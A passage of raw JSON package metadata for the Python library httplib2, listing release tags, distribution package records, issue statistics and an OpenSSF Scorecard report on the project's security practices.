cosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T12:54:59.084Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:openbsd/www/py-httplib2?arch=amd64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/openbsd/www/py-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/openbsd/www/py-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/openbsd/www/py-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages/www%2Fpy-httplib2/codemeta","maintainers":[{"uuid":"ports@openbsd.org","login":null,"name":"The OpenBSD ports mailing-list","email":"ports@openbsd.org","url":null,"packages_count":6235,"html_url":null,"role":null,"created_at":"2026-05-28T02:06:04.138Z","updated_at":"2026-05-28T02:06:04.138Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/maintainers/ports@openbsd.org/packages"}],"registry":{"name":"openbsd-7.9-amd64","url":"https://cdn.openbsd.org/pub/OpenBSD/7.9/packages/amd64","ecosystem":"openbsd","default":true,"packages_count":11808,"maintainers_count":274,"namespaces_count":42,"keywords_count":23,"github":"openbsd","metadata":{"arch":"amd64","sqlports_version":"7.54","funded_packages_count":219},"icon_url":"https://github.com/openbsd.png","created_at":"2026-05-26T11:21:10.750Z","updated_at":"2026-08-25T05:00:07.823Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/openbsd-7.9-amd64/namespaces"}},{"id":6100480,"name":"py3-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python3)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2018-05-01T18:31:49.000Z","latest_release_published_at":"2018-05-01T18:31:49.000Z","latest_release_number":"0.11.1-r0","last_synced_at":"2026-03-19T02:00:26.651Z","created_at":"2023-01-31T20:46:35.820Z","updated_at":"2026-08-21T12:54:59.085Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.8/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses 